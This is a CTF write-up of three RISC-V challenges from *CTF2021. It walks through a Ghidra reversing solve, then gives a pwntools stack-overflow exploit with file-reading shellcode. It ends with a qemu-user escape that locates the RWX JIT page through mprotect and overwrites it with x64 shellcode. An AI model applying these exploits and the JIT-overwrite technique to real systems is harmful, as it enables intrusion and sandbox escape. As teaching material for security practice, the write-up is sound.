Mid Station

[*CTF2021] Favourite Architecture Challenges

Last weekend the sixstar team ran a series of RISC-V challenges in their CTF. As the challenge name suggests, I enjoy playing RISC-V challenges very much. Three flags could be found at the checkpoints:

  • Favourite Architecture 0: Reverse challenge, 25 solved
  • Favourite Architecture 1: Userspace pwn challenge, read /home/pwn/flag. 24 solved
  • Favourite Architecture 2: Qemu userspace escape pwn challenge, execute /readflag2. 6 solved

Recon

The challenge designer provided a zip file that can be used to build the docker image.

Archive:  c11db24e682f4d4d802f4a3ca9ca76b8.zip
   Length     Date     Time   Name
---------  ----------  -----  ----
        0  2021-01-16  01:01  favourite_architecture/
      347  2021-01-15  23:02  favourite_architecture/Dockerfile
      125  2021-01-16  00:42  favourite_architecture/README.md
      204  2021-01-15  22:05  favourite_architecture/build.sh
      409  2021-01-15  22:49  favourite_architecture/docker-compose.yml
        6  2021-01-16  00:43  favourite_architecture/flag2
     1319  2021-01-15  21:33  favourite_architecture/patch
     8504  2021-01-15  22:47  favourite_architecture/readflag2
        0  2021-01-15  22:56  favourite_architecture/share/
       60  2021-01-15  22:42  favourite_architecture/share/entry
        6  2021-01-16  00:43  favourite_architecture/share/flag
   385912  2021-01-15  23:12  favourite_architecture/share/main
 23771760  2021-01-15  23:12  favourite_architecture/share/qemu-riscv64
        0  2021-01-15  23:12  favourite_architecture/tmp/
      631  2021-01-15  23:02  favourite_architecture/xinetd
---------                     -------
 24169283                     15 files

Generally, there are three important files:

main: riscv64 elf file

./main: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=c54b93fd63fcb530ed539bd25e4322a08324b0b7, stripped
checksec:
Arch: em_riscv-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x10000)
RWX: Has RWX segments

The riscv64 file was compiled without any mitigations.

qemu-riscv64: patched qemu userspace emulator

The qemu-riscv64 binary is version 5.2 of the qemu userspace emulator with the following patch applied, which adds a whitelist that allows only a subset of syscalls.

diff --git a/linux-user/syscall.c b/linux-user/syscall.c
index 27adee9..2d75464 100644
--- a/linux-user/syscall.c
+++ b/linux-user/syscall.c
@@ -13101,8 +13101,31 @@ abi_long do_syscall(void *cpu_env, int num, abi_long arg1,
         print_syscall(cpu_env, num, arg1, arg2, arg3, arg4, arg5, arg6);
     }

-    ret = do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,
-                      arg5, arg6, arg7, arg8);
+    switch (num) {
+        // syscall whitelist
+        case TARGET_NR_brk:
+        case TARGET_NR_uname:
+        case TARGET_NR_readlinkat:
+        case TARGET_NR_faccessat:
+        case TARGET_NR_openat2:
+        case TARGET_NR_openat:
+        case TARGET_NR_read:
+        case TARGET_NR_readv:
+        case TARGET_NR_write:
+        case TARGET_NR_writev:
+        case TARGET_NR_mmap:
+        case TARGET_NR_munmap:
+        case TARGET_NR_exit:
+        case TARGET_NR_exit_group:
+        case TARGET_NR_mprotect:
+            ret = do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,
+                              arg5, arg6, arg7, arg8);
+            break;
+        default:
+            printf("[!] %d bad system call\n", num);
+            ret = -1;
+            break;
+    }

     if (unlikely(qemu_loglevel_mask(LOG_STRACE))) {
         print_syscall_ret(cpu_env, num, ret, arg1, arg2,
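
To make the filter concrete, here is a small Python sketch that mimics the patched switch statement. The syscall numbers are the riscv64 values from the generic Linux syscall table; the names WHITELIST, ALLOWED and filtered_syscall are mine and do not appear in the patch.

```python
# riscv64 Linux syscall numbers (generic syscall table) for the whitelisted calls.
WHITELIST = {
    "brk": 214, "uname": 160, "readlinkat": 78, "faccessat": 48,
    "openat2": 437, "openat": 56, "read": 63, "readv": 65,
    "write": 64, "writev": 66, "mmap": 222, "munmap": 215,
    "exit": 93, "exit_group": 94, "mprotect": 226,
}
ALLOWED = set(WHITELIST.values())


def filtered_syscall(num):
    """Mimic the patched do_syscall(): forward whitelisted calls, reject the rest."""
    if num in ALLOWED:
        return "forwarded to do_syscall1"
    print("[!] %d bad system call" % num)
    return -1


if __name__ == "__main__":
    filtered_syscall(WHITELIST["mprotect"])  # allowed
    filtered_syscall(221)                    # execve: rejected
    filtered_syscall(80)                     # fstat: rejected
```

Note that execve (221) is not on the list, so a plain execve shellcode inside the guest cannot run /readflag2.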

entry: launcher script

entry is a bash script to launch the challenge.

#!/bin/bash
exec 2>/dev/null
timeout 30 ./qemu-riscv64 main

Favourite Architecture 0

Unfortunately, my favorite reverse engineering tool, IDA Pro, still does not support this “favorite architecture”, but we can turn to the powerful Ghidra, which has had nice support since version 9.2, released in November 2020: Ghidra: Release Notes
I was too lazy to update, so I finished this challenge with a development build from August 2020. The old version is enough, and I guess the new release has better support for RISC-V.
With the string Input the flag: we can quickly locate the main function at 0x10400, but the decompile window shows “Unknown Error”. Here is a little trick to work around this issue:

  1. Locate the function in which the gp value is set. In this case it is 0x101ec, which can be decompiled automatically:

    void FUN_000101ec(void)
    {
        gp = (undefined *)0x6f178;
        return;
    }

    We can see that gp is set to 0x6f178, and this value stays the same for the whole run.
  2. Press Ctrl-A in the disassembly window to select all the code, then press Ctrl-R to open the set register window. In this window, we can set the correct gp value.
  3. Go back to the main function at 0x10400, and now it can be decompiled correctly.

The decompiled result is pretty readable. With some guessing, we can identify the library functions and understand the logic.

undefined8 UndefinedFunction_00010400(void)
{
    ulonglong uVar1;
    longlong lVar2;
    undefined auStack488 [192];
    undefined auStack296 [256];
    ulonglong uStack40;
    longlong lStack32;
    int iStack20;

    setvbuf(PTR_DAT_0006ea28,0);
    setvbuf(PTR_DAT_0006ea20,0);
    setvbuf(PTR_DAT_0006ea18,0);
    puts("Input the flag: ");
    gets(auStack296);
    uVar1 = strlen(auStack296);
    /* len == 0x59 */
    if (uVar1 == ((longlong)(iRam000000000006e9dc + iRam000000000006e9d8) & 0xffffffffU)) {
        /* input+0x29 */
        lStack32 = strdup(auStack296 + ((longlong)iRam000000000006e9d8 & 0xffffffff));
        FUN_0001118a(auStack488,"tzgkwukglbslrmfjsrwimtwyyrkejqzo","oaeqjfhclrqk",0x80);
        FUN_000111ea(auStack488,auStack296,iRam000000000006e9d8);
        lVar2 = strcmp(auStack296,&DAT_0006d000,iRam000000000006e9d8);
        if (lVar2 == 0) {
            uStack40 = strlen(lStack32);
            iStack20 = 0;
            while( true ) {
                if (uStack40 >> 3 <= (ulonglong)(longlong)iStack20) {
                    printf("You are right :D");
                    gp = (undefined *)0x6f178;
                    return 0;
                }
                FUN_000102ae(iStack20 * 8 + lStack32,&DAT_0006d060);
                lVar2 = strcmp(iStack20 * 8 + lStack32,(longlong)(iStack20 * 8) + 0x6d030,8);
                if (lVar2 != 0) break;
                iStack20 = iStack20 + 1;
            }
        }
    }
    printf("You are wrong ._.");
    gp = (undefined *)0x6f178;
    return 1;
}

So after getting the input, it first checks whether the length is 0x59, and then performs the verification in two steps:

  1. The first 0x29 bytes of the input are encrypted with 0x1118a and 0x111ea, and the result is compared with the bytes at 0x6d000.
  2. The last 0x30 bytes of the input are split into 6 qword groups, each passed to 0x102ae with the key at 0x6d060, and the result is compared with the bytes at 0x6d030.

For the first part, we can track down 0x1118a and find some clues in 0x106ce:

    void FUN_000106ce(longlong param_1,longlong param_2,longlong param_3)
    {
    undefined4 uVar1;

    FUN_00021386(param_1 + 0x48,param_2,0x20);
    FUN_00021386(param_1 + 0x68,param_3,0xc);
    uVar1 = FUN_000105ce("expand 32-byte k");
    *(undefined4 *)(param_1 + 0x80) = uVar1;
    uVar1 = FUN_000105ce("nd 32-byte k");
    *(undefined4 *)(param_1 + 0x84) = uVar1;
    uVar1 = FUN_000105ce("2-byte k");
    *(undefined4 *)(param_1 + 0x88) = uVar1;
    uVar1 = FUN_000105ce("te k");
    *(undefined4 *)(param_1 + 0x8c) = uVar1;
    uVar1 = FUN_000105ce(param_2);
    *(undefined4 *)(param_1 + 0x90) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 4);
    *(undefined4 *)(param_1 + 0x94) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 8);
    *(undefined4 *)(param_1 + 0x98) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0xc);
    *(undefined4 *)(param_1 + 0x9c) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x10);
    *(undefined4 *)(param_1 + 0xa0) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x14);
    *(undefined4 *)(param_1 + 0xa4) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x18);
    *(undefined4 *)(param_1 + 0xa8) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x1c);
    *(undefined4 *)(param_1 + 0xac) = uVar1;
    *(undefined4 *)(param_1 + 0xb0) = 0;
    uVar1 = FUN_000105ce(param_3);
    *(undefined4 *)(param_1 + 0xb4) = uVar1;
    uVar1 = FUN_000105ce(param_3 + 4);
    *(undefined4 *)(param_1 + 0xb8) = uVar1;
    uVar1 = FUN_000105ce(param_3 + 8);
    *(undefined4 *)(param_1 + 0xbc) = uVar1;
    FUN_00021386(param_1 + 0x68,param_3,0xc);
    gp = (undefined *)0x6f178;
    return;
    }

It looks like the key initialization function. Searching for the constant “expand 32-byte k” shows that it comes from Salsa20: Salsa20
The encryption logic is quite similar, but some magic numbers do not seem to match the generic algorithm. The key point is that Salsa20 is a symmetric stream cipher, so the same logic decrypts the ciphertext. So I simply sent the bytes at 0x6d000, which are 0x29 bytes long, followed by 0x30 \x00 bytes. Then I set a breakpoint at the strcmp call to read the plaintext from memory; it was flag{have_you_tried_ghidra9.2_decompiler_
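
As a side note, the layout in 0x106ce (four constant words first, then eight key words, a zero counter and a 12-byte nonce) looks closer to ChaCha20, a Salsa20 derivative, than to classic Salsa20, which may explain the mismatch; I did not verify this against the binary. The sketch below shows how the constant splits into four little-endian words, and why feeding the ciphertext back through a stream cipher yields the plaintext. The keystream here is a stand-in, not real cipher output, and the function name xor_stream is mine.

```python
import struct

# The four 32-bit words that the init function loads from the constant string.
words = struct.unpack("<4I", b"expand 32-byte k")
print([hex(w) for w in words])


def xor_stream(data, keystream):
    """A stream cipher XORs data with a keystream; the same call decrypts."""
    return bytes(d ^ k for d, k in zip(data, keystream))


# Stand-in keystream for illustration only (NOT produced by the real cipher).
keystream = bytes(range(1, 17))
plain = b"flag{toy_sample}"
cipher = xor_stream(plain, keystream)

# Encrypting the ciphertext again gives back the plaintext.
assert xor_stream(cipher, keystream) == plain
```

This is the property used above: sending the stored ciphertext as input makes the binary itself decrypt it.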
For the second part, it turned out that 0x102ae is a naive encryption function with 0x10 (16) rounds:

void FUN_000102ae(uint *param_1,int *param_2)
{
    uint local_20;
    int local_1c;
    uint local_18;
    uint local_14;

    local_14 = *param_1;
    local_18 = param_1[1];
    local_1c = 0;
    local_20 = 0;
    while (local_20 < 0x10) {
        local_1c = local_1c + -0x61c88647;
        local_14 = ((local_18 >> 5) + param_2[1] ^ local_1c + local_18 ^ local_18 * 0x10 + *param_2) +
                   local_14;
        local_18 = ((local_14 >> 5) + param_2[3] ^ local_1c + local_14 ^ local_14 * 0x10 + param_2[2]) +
                   local_18;
        local_20 = local_20 + 1;
    }
    *param_1 = local_14;
    param_1[1] = local_18;
    gp = (undefined *)0x6f178;
    return;
}
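
The constant gives the cipher away: -0x61c88647 is 0x9e3779b9 modulo 2^32, the delta used by TEA, and the round body has the TEA shape with 16 rounds. Below is a minimal Python sketch of the round function and its inverse, assuming I read the decompiled code correctly. The function names are mine, and the round trip is checked on a made-up block rather than on the real ciphertext.

```python
import struct

MASK = 0xFFFFFFFF
DELTA = (-0x61c88647) & MASK   # 0x9e3779b9
ROUNDS = 0x10


def encrypt_block(v0, v1, key):
    """Mirror of FUN_000102ae: 16 rounds, sum counts up from 0."""
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK
        v0 = (v0 + (((v1 >> 5) + key[1]) ^ (s + v1) ^ ((v1 << 4) + key[0]))) & MASK
        v1 = (v1 + (((v0 >> 5) + key[3]) ^ (s + v0) ^ ((v0 << 4) + key[2]))) & MASK
    return v0, v1


def decrypt_block(v0, v1, key):
    """Inverse: undo the two half-rounds in reverse order, sum counts down."""
    s = (DELTA * ROUNDS) & MASK
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 >> 5) + key[3]) ^ (s + v0) ^ ((v0 << 4) + key[2]))) & MASK
        v0 = (v0 - (((v1 >> 5) + key[1]) ^ (s + v1) ^ ((v1 << 4) + key[0]))) & MASK
        s = (s - DELTA) & MASK
    return v0, v1


KEY = (0x1368a0bb, 0x190ace1e, 0x35d8a357, 0x26bf2c61)  # key words used in this write-up
block = struct.unpack("<2I", b"ABCDEFGH")                # made-up test block
assert decrypt_block(*encrypt_block(*block, KEY), KEY) == block
```

Each half-round only adds a value computed from the other half, so it can be undone by subtracting the same value, which is why no brute force is needed.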

My first idea was to brute-force the plaintext, because the first part of the flag suggested that it consisted only of lowercase letters. I even wrote a simple Python script for this task, but it was too slow. Later, I realized that the function can be reversed, so I wrote a simple C program with a decrypt function to get the rest of the flag.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* key words from 0x6d060 */
static const uint32_t key[4] = {0x1368a0bb, 0x190ace1e, 0x35d8a357, 0x26bf2c61};

/* Undo the 16 rounds of FUN_000102ae; sum starts at its final value. */
static void reverse(uint32_t sum, uint32_t a1, uint32_t a2) {
    char buf[9] = {0};  /* 8 bytes of plaintext plus a terminator */
    for (int i = 0; i < 0x10; i++) {
        a2 -= ((a1 >> 5) + key[3]) ^ (sum + a1) ^ ((a1 << 4) + key[2]);
        a1 -= ((a2 >> 5) + key[1]) ^ (sum + a2) ^ ((a2 << 4) + key[0]);
        sum += 0x61c88647;
    }
    memcpy(buf, &a1, 4);
    memcpy(buf + 4, &a2, 4);
    printf("%s", buf);
}

int main(void) {
    uint32_t sum = 0;
    for (int i = 0; i < 0x10; i++) {
        sum -= 0x61c88647;
    }
    reverse(sum, 0xc45087f9, 0x0703f2b2);
    reverse(sum, 0x6974f43c, 0xedb4bb59);
    reverse(sum, 0x0ff0b02a, 0x008520f2);
    reverse(sum, 0xfdcd23dd, 0x35024875);
    reverse(sum, 0xf1d7b6d3, 0x74f21be1);
    reverse(sum, 0xcb2dbf12, 0xa4b453f6);
    return 0;
}

It printed _if_you_have_hexriscv_plz_share_it_with_me_thx:P} , so the final flag for this checkpoint is flag{have_you_tried_ghidra9.2_decompiler_if_you_have_hexriscv_plz_share_it_with_me_thx:P}

Favourite Architecture 1

Before I analyzed the vulnerability, I noticed that at one point more teams had solved Favourite Architecture 1 than 0, so the vulnerability must be independent of the flag verification in the reversing challenge. For an experienced pwner the bug is pretty obvious: the input is read with gets.

Because the binary has no mitigations, there are many ways to achieve RCE, including the old-school nop-sled technique. However, we want a stable trigger on the remote machine, so I spent some time finding a gadget that reaches the shellcode unconditionally. I chose to jump to 0x10442: since we control s0, we can point the argument of gets at an address in .bss, and when the main function finishes, we pivot to .bss and execute the shellcode received by the second gets.

010442  93 07 84 ed    addi  a5,s0,-0x128
010446  3e 85          c.mv  a0,a5
010448  ef 60 20 61    jal   ra,gets          undefined gets()
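
The payload layout follows from this gadget. The sketch below rebuilds it with plain struct calls so the offsets are visible. It assumes the usual GCC frame layout (saved ra at s0-8, saved s0 at s0-16), which I did not read from the binary but which matches the 280-byte padding used in the exploit. The 504 filler bytes are taken from the exploit as-is; presumably that is the stack slot from which the second return reloads ra.

```python
import struct

BUF_TO_S0 = 0x128      # gets() buffer is at s0 - 0x128 (addi a5,s0,-0x128)
SAVED_S0_OFF = 16      # assumption: saved s0 lives at s0 - 16, saved ra at s0 - 8
BSS = 0x6f000          # writable and executable target for the shellcode
CALL_GETS = 0x10442    # gadget: a0 = s0 - 0x128; call gets

pad = BUF_TO_S0 - SAVED_S0_OFF                 # bytes from buffer start to saved s0
payload = b"A" * pad
payload += struct.pack("<Q", BSS + BUF_TO_S0)  # new s0, so that s0 - 0x128 == BSS
payload += struct.pack("<Q", CALL_GETS)        # new ra: re-enter main at the gadget
payload += b"B" * 504                          # filler, value taken from the exploit
payload += struct.pack("<Q", BSS)              # ra for the second return: shellcode

print(pad, len(payload))
```

The only hard requirement on the bytes is that none of them is a newline, since gets stops reading there.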

The exploit is not complicated:

from pwn import *
import re
import sys
import time

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}

if len(sys.argv) == 1:
    p = process('./cmd')
    is_remote = False
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])
    is_remote = True

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))

if not is_remote:
    time.sleep(0.5)
    # subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])

sc = open("sc.bin", "rb").read()
assert b"\n" not in sc  # gets() stops at a newline

gets = 0x16a5a
call_gets = 0x10442

# first gets(): overwrite saved s0 and ra, then plant the second return address
data = cyclic(280) + p64(0x6f000 + 0x128)
data += p64(call_gets)
data += cyclic(504) + p64(0x6f000)

time.sleep(0.5)
sla(b"flag:", data)
sl(sc)  # second gets() reads the shellcode into 0x6f000

p.interactive()
# flag1: flag{an_easy_rv64_stack_overflow_in_qemu_user}

sc.bin contains the raw shellcode and can be generated from the following assembly code, which is modified from my previous writeup: https://matshao.com/2020/05/18/DEFCON-2020-Quals-nooopsled/

# riscv64-linux-gnu-as sc.asm -o sc
# riscv64-linux-gnu-objcopy -S -O binary -j .text sc sc.bin

    .section .text
    .globl _start
    .option rvc
_start:
    # openat(AT_FDCWD, "flag", O_RDONLY)
    li a1, 0x67616c66       # "flag"
    sd a1, 8(sp)
    addi a1, sp, 8
    li a0, -100             # AT_FDCWD
    li a2, 0
    li a7, 56               # __NR_openat
    ecall

    # read(fd, sp+8, 56): a0 already holds the fd
    c.mv a2, a7
    addi a7, a7, 7          # 63 = __NR_read
    ecall

    # write(1, sp+8, 56)
    li a0, 1
    addi a7, a7, 1          # 64 = __NR_write
    ecall
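
Two small tricks keep this shellcode short; the sketch below checks them in Python. The variable names are mine.

```python
import struct

# "sd a1, 8(sp)" stores the full 64-bit register, so the path is NUL-terminated.
path = struct.pack("<Q", 0x67616c66)
print(path)

# The syscall numbers are derived from each other instead of being reloaded.
NR_OPENAT = 56
NR_READ = NR_OPENAT + 7    # addi a7, a7, 7
NR_WRITE = NR_READ + 1     # addi a7, a7, 1

# "c.mv a2, a7" reuses the openat number as the byte count for read and write.
count = NR_OPENAT
```

Because the path is relative, the shellcode relies on the working directory of the process being the one that contains the flag file.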

Favourite Architecture 2

This checkpoint is the highlight of the challenges. We are required to execute readflag2 to get the flag. We already have RCE in the RISC-V guest from the last checkpoint, but readflag2 is an x64 ELF, so we need to escape from qemu-riscv64 to execute it.
The hint for this task is the syscall whitelist in the patch file: we are supposed to get RCE in the qemu userspace emulator using only these syscalls.

+        case TARGET_NR_brk:
+        case TARGET_NR_uname:
+        case TARGET_NR_readlinkat:
+        case TARGET_NR_faccessat:
+        case TARGET_NR_openat2:
+        case TARGET_NR_openat:
+        case TARGET_NR_read:
+        case TARGET_NR_readv:
+        case TARGET_NR_write:
+        case TARGET_NR_writev:
+        case TARGET_NR_mmap:
+        case TARGET_NR_munmap:
+        case TARGET_NR_exit:
+        case TARGET_NR_exit_group:
+        case TARGET_NR_mprotect:

I guess the purpose of this challenge is not to find a 0day in the qemu user emulator implementation, but more likely to get RCE through some logic bug. When we attach gdb to the qemu-riscv64 process and print the memory maps, we can see a region with rwx permissions (0x7fffe8000000-0x7fffeffff000). It is used by the JIT code generator. And if we attach gdb to the gdb stub of the qemu user emulator, the vmmap command shows all memory as rwx. This result is not very convincing, but it made me wonder whether we could access the JIT code page from the RISC-V user space. If so, we can write x64 shellcode to the JIT code page and make the emulator execute it.

vmmap of qemu-riscv64
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x10000 0x6a000 r--p 5a000 0 /pwn/test
0x6a000 0x6b000 ---p 1000 0
0x6b000 0x6e000 rw-p 3000 5a000 /pwn/test
0x6e000 0x92000 rw-p 24000 0
0x4000000000 0x4000001000 ---p 1000 0
0x4000001000 0x4000801000 rw-p 800000 0
0x555555554000 0x5555559bd000 r-xp 469000 0 /pwn/qemu-riscv64
0x555555bbc000 0x555555bf8000 r--p 3c000 468000 /pwn/qemu-riscv64
0x555555bf8000 0x555555c24000 rw-p 2c000 4a4000 /pwn/qemu-riscv64
0x555555c24000 0x555555ce9000 rw-p c5000 0 [heap]
0x7fffe8000000 0x7fffeffff000 rwxp 7fff000 0
0x7fffeffff000 0x7ffff0000000 ---p 1000 0
0x7ffff0000000 0x7ffff0021000 rw-p 21000 0
0x7ffff0021000 0x7ffff4000000 ---p 3fdf000 0
0x7ffff6c43000 0x7ffff6cc4000 rw-p 81000 0

vmmap when connected to the gdb stub provided by qemu-riscv64
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000000000 0xffffffffffffffff 0x0000000000000000 rwx /pwn/test

But we need to know the address of the JIT code page. My first idea was to check /proc/self/maps from the RISC-V program. I wrote a simple program, compiled it as a static RISC-V ELF, and executed it with qemu-riscv64. It seems that the emulator has special logic for these proc files: we could not read any emulator address from it.

10000-6a000 r--p 00000000 00:35 144454                                   /pwn/test
6a000-6b000 ---p 00000000 00:00 0
6b000-6e000 rw-p 0005a000 00:35 144454 /pwn/test
6e000-92000 rw-p 00000000 00:00 0
4000000000-4000001000 ---p 00000000 00:00 0
4000001000-4000801000 rw-p 00000000 00:00 0 [stack]

I also tried searching for a JIT page pointer from 0x1000 to 0x4000801000, but that did not work. Then I noticed that the whitelist contains some memory-related syscalls; maybe we can use them to search for the JIT page address? It sounded worth trying!
I wrote a simple function to brute-force the JIT code page address with mprotect. Running the emulator several times showed that the address is always a multiple of 0x000004000000. We probe va+0x4000 instead of va because the JIT code is placed from the start of the region, and we need to avoid touching the running JIT code; otherwise the emulator crashes.
We compiled the program as a static RISC-V ELF, and it successfully gave us the address of the JIT page.

size_t test_map() {
    size_t va = 0x7f0000000000;
    size_t inc = 0x000004000000;
    int res;
    while (1) {
        /* succeeds only if va+0x4000 is a mapped page */
        res = mprotect((void *)(va + 0x4000), 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
        if (res >= 0) {
            printf("find: %lx\n", va);
            break;
        }
        va += inc;
    }
    return va;
}
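
A quick feasibility check of this scan, as a Python sketch: with a step of 0x4000000 the whole 0x7f... range needs at most 16384 mprotect calls. The upper bound END and the probe callback are my assumptions for the simulation; the real probe is the mprotect call above, which succeeds on any mapped page, not only on the JIT region.

```python
START = 0x7f0000000000
STEP = 0x4000000
END = 0x800000000000   # assumption: top of the x86-64 user address space


def scan(probe, start=START, step=STEP, end=END):
    """Walk candidate bases and return the first one the probe accepts."""
    tries = 0
    for va in range(start, end, step):
        tries += 1
        if probe(va):
            return va, tries
    return None, tries


worst_case = (END - START) // STEP
print("worst case probes:", worst_case)

# Simulated oracle using the JIT base seen in the vmmap output of this write-up.
jit_base = 0x7fffe8000000
found, tries = scan(lambda va: va == jit_base)
print(hex(found), tries)
```

A few thousand failing syscalls are cheap, so the scan fits easily within the 30 second timeout of the entry script.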

Then we added x64 shellcode injection to test whether we can hijack the control flow by writing to the JIT code page. We injected x64 shellcode that prints “here”, and it worked.

#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>

void breakpoint() {
    getchar();
}

// echo here shellcode
unsigned char sc[] = {0x68, 0x68, 0x65, 0x72, 0x65, 0x6a, 0x1, 0x58, 0x6a, 0x1, 0x5f, 0x6a, 0x4, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5};

void * VA;

size_t test_map() {
    size_t va = 0x7f0000000000;
    size_t inc = 0x000004000000;
    int res;
    while (1) {
        res = mprotect((void *)(va + 0x4000), 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
        if (res >= 0) {
            printf("find: %lx\n", va);
            break;
        }
        va += inc;
    }
    return va;
}

int main() {
    int res = 0;
    int pid;
    char *addr;
    char buf[0x100];

    memset(buf, 0x90, 0x100);       // NOP sled
    memcpy(buf+0x80, sc, 19);
    addr = (char *)test_map();
    fflush(0);
    breakpoint();
    memcpy(addr, buf, 0x100);       // overwrite the JIT code with sled + shellcode
    // memset(addr, 0xcc, 100);
    return 0;
}
root@matthew-Virtual-Machine:/pwn# ./qemu-riscv64  ./test
[!] 80 bad system call
find: 7fc480000000
[!] 80 bad system call
hereSegmentation fault (core dumped)
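
For readers who want to check the 19 shellcode bytes used in the test program, here is a hand-decoded breakdown as a Python sketch. The mnemonics are my own reading of the bytes, not assembler output.

```python
# The x64 test shellcode, split into instructions by hand.
DECODED = [
    (bytes([0x68, 0x68, 0x65, 0x72, 0x65]), "push 0x65726568   ; 'here'"),
    (bytes([0x6a, 0x01]),                   "push 1"),
    (bytes([0x58]),                         "pop rax           ; SYS_write"),
    (bytes([0x6a, 0x01]),                   "push 1"),
    (bytes([0x5f]),                         "pop rdi           ; fd = stdout"),
    (bytes([0x6a, 0x04]),                   "push 4"),
    (bytes([0x5a]),                         "pop rdx           ; count = 4"),
    (bytes([0x48, 0x89, 0xe6]),             "mov rsi, rsp      ; buf = 'here' on the stack"),
    (bytes([0x0f, 0x05]),                   "syscall"),
]

sc = b"".join(raw for raw, _ in DECODED)
for raw, text in DECODED:
    print(raw.hex().ljust(12), text)

# The immediate of the first push is the string that gets printed.
message = sc[1:5]
```

There is no exit after the syscall, so execution falls through into whatever follows, which is consistent with the segmentation fault printed right after “here”.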

From this experiment, we know that we can find the JIT code page address with mprotect, write x64 shellcode to the page, and get RCE in the emulator. The next step is to construct RISC-V shellcode for the job.

# riscv64-linux-gnu-as sc1.asm -o sc
# riscv64-linux-gnu-objcopy -S -O binary -j .text sc sc.bin
_start:
    li a3, BASE
    li a4, INC
    li a5, 0xf000
loop:
    # mprotect(a3 + 0xf000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
    add a0, a3, a5
    li a1, 0x1000
    li a2, 7
    li a7, 226              # mprotect
    ecall

    beq a0, zero, succ
    add a3, a3, a4
    j loop

succ:
    # try output a3: write(1, 0x6f200, 0x10)
    li a1, 0x6f200
    sd a3, 0(a1)
    li a0, 1
    li a2, 0x10
    li a7, 64               # write
    ecall

    # rwx page at a3
    # read(0, 0x6f200, 0x200)
    li a0, 0
    li a1, 0x6f200          # x86 sc buf
    li a2, 0x200
    li a7, 63               # read
    ecall

    # copy from 0x6f200 to a3, highest address first
    addi a3, a3, 0x200
    addi a1, a1, 0x200
    li a2, 0x80
copy:
    ld a5, 0(a1)
    sd a5, 0(a3)
    addi a1, a1, -4
    addi a3, a3, -4
    beq a2, zero, finish
    addi a2, a2, -1
    j copy

finish:
    li a7, 93               # exit
    ecall

The assembly code works as follow:

  1. Search for the JIT code page with mprotect(va+0xf000, 0x1000, 7). The offset was changed from 0x4000 to 0xf000 because we found that 0x4000 does not work on the remote machine.
  2. Receive the x64 shellcode with read(0, 0x6f200, 0x200).
  3. Copy the x64 shellcode from 0x6f200 to va, from higher addresses to lower ones, to avoid ruining the running JIT code by accident.
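
The copy loop in step 3 is easy to get wrong, so here is a Python simulation of it, written from my reading of the assembly. It moves 8 bytes per iteration but steps back only 4, and it runs 0x81 times, so it covers offsets 0x208 down to 0. The function name and the test buffers are mine.

```python
def copy_loop(src, dst, top=0x200, count=0x80):
    """Simulate the RISC-V copy loop: ld/sd 8 bytes, step -4, stop when count hits 0."""
    off = top          # both a1 and a3 start 0x200 past their base
    n = count          # a2
    while True:
        dst[off:off + 8] = src[off:off + 8]   # ld a5, 0(a1); sd a5, 0(a3)
        off -= 4                              # addi a1/a3, -4
        if n == 0:                            # beq a2, zero, finish
            break
        n -= 1                                # addi a2, a2, -1
    return off


src = bytes(range(256)) * 3          # 768 bytes of recognisable test data
dst = bytearray(len(src))
last = copy_loop(src, dst)
print(hex(last & 0xFFFFFFFF))
```

Since the start of the region is written last, the code that the emulator is currently executing stays intact until the final iterations.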
And the Python exploit looks like this:

from pwn import *
import re
import subprocess
import sys
import time

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}

if len(sys.argv) == 1:
    p = process('./cmd')
    is_remote = False
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])
    is_remote = True

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))

if not is_remote:
    time.sleep(0.5)
    # subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])
    pid = subprocess.check_output(['pidof', 'qemu-riscv64'])
    pid = pid.strip().decode()
    subprocess.call(['tmux', 'split-window', '-h', 'gdb', 'attach', pid])

def update_sc():
    subprocess.call(["./build_sc.sh"])

update_sc()
sc = open("sc.bin", "rb").read()
